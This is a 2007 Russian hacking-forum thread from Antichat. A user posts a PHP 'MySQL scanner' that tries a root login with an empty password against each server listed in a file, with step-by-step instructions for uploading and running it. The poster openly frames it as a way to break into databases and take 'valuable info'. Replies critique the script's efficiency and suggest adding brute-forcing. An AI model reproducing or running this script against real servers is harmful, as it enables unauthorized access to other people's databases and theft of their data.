Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
09.08.2007, 15:57
|
|
Banned
Регистрация: 09.08.2007
Сообщений: 56
Провел на форуме:
372630
Репутация:
-63
|
|
Сканер MySQL
Хочу представить вашему вниманию сканер.
Код сканера взят с inattack.ru (c)
Код:
<?
set_time_limit(0);
# берём список серверов для сканирования из файла servers.dat
$servers=file("servers.dat");
# получаем кол-во записей в файле
$strings=count($servers);
for($i=0; $i<$strings; $i++){
$server=$servers[$i];
# функция коннекта к базе, передаем переменную $server
connect($server);
}
function connect($server)
# а вот и сама функция подключения
{
# коннект к базе (сервер,"логин","пароль")
$co=mysql_connect($server,"root","");
# если подключится не удалось
if(!($co))
{
echo "connect 2 server $server failed<br>";
}
# если подключились то выводим сообщение
else
{
echo "connect 2 server $server success<br>";
}
}
?>
Теперь обзываем этот скрипт sqlbrute.php и закидываем на сервак. После этого создаём файл servers.dat со
списком адресов для сканирования и также аплоадим на сервер. После всего этого в браузере набиваем:
www.ваш_сайт.ru/sqlbrute.php и получаем отчёт =)
Возможно некоторые станут говорить что мол только лохи оставляют пустые пароли на базу данных и мол таких
дебильных админов найти невозможно, но я основываясь на своём опыте могу вам сказать что таких админов
достаточно много и кто ищет тот всегда найдёт.
Ну вот и всё. Хорошего вам коннекта, пухлых баз данных и гигабайтов ценной инфы. |
|
|
09.08.2007, 16:03
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Дэ, конечно...
Хоть бы результат в файл писал... и если, уж на то пошло, то ignore_user_abort(); не помешал бы...
Последний раз редактировалось Dr.Check; 09.08.2007 в 16:05..
|
|
|
|
09.08.2007, 16:19
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Сообщение от Dr.Check
Дэ, конечно...
Хоть бы результат в файл писал... и если, уж на то пошло, то ignore_user_abort(); не помешал бы...
А нах ignore_user_abort(); , если вывод в браузер идет, а не в файл?
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
09.08.2007, 16:20
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
А нах ignore_user_abort(); , если вывод в браузер идет, а не в файл?
Так я и написал, что надо вывод в файл делать а не в браузер. Закроешь и пистец результату.
|
|
|
|
09.08.2007, 16:34
|
|
Banned
Регистрация: 09.08.2007
Сообщений: 56
Провел на форуме:
372630
Репутация:
-63
|
|
ignore_user_abort();
Уважаемый, если вывод идет в браузер, то потеря последует только если у Вас кривые руки.
|
|
|
|
09.08.2007, 16:52
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Уважаемый, если вывод идет в браузер, то потеря последует только если у Вас кривые руки.
Вот кто писал этот скрипт, тот криворукий.
Представь, что в файле 10000000 ссылок. И подумай сколько они будет проверятся. Мне кажется удобнее, то закрыть браузер на это время. Потом я более чем уверен, что ты будешь делать копипаст из браузера, в файл. Тебе говорят как удобнее будет. И как правильнее.
Последний раз редактировалось Dr.Check; 09.08.2007 в 16:54..
|
|
|
|
09.08.2007, 16:56
|
|
Banned
Регистрация: 09.08.2007
Сообщений: 56
Провел на форуме:
372630
Репутация:
-63
|
|
Хорошо учту.
Но в файле столько ссылок быть не может  |
|
|
|
11.08.2007, 11:56
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
Вот кто писал этот скрипт, тот криворукий.
насколько я помню, написал 1dt.w0lf_, но не столь важно. скрипт уже не актуален, ибо сервера MySQL очень редко оставляют с дефолтовым доступом root:пустой пароль.
можно, конечно, его переделать так чтобы проводить брут, но на php сканирование будет проходить медленно, да и брутеров mysql много уже...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
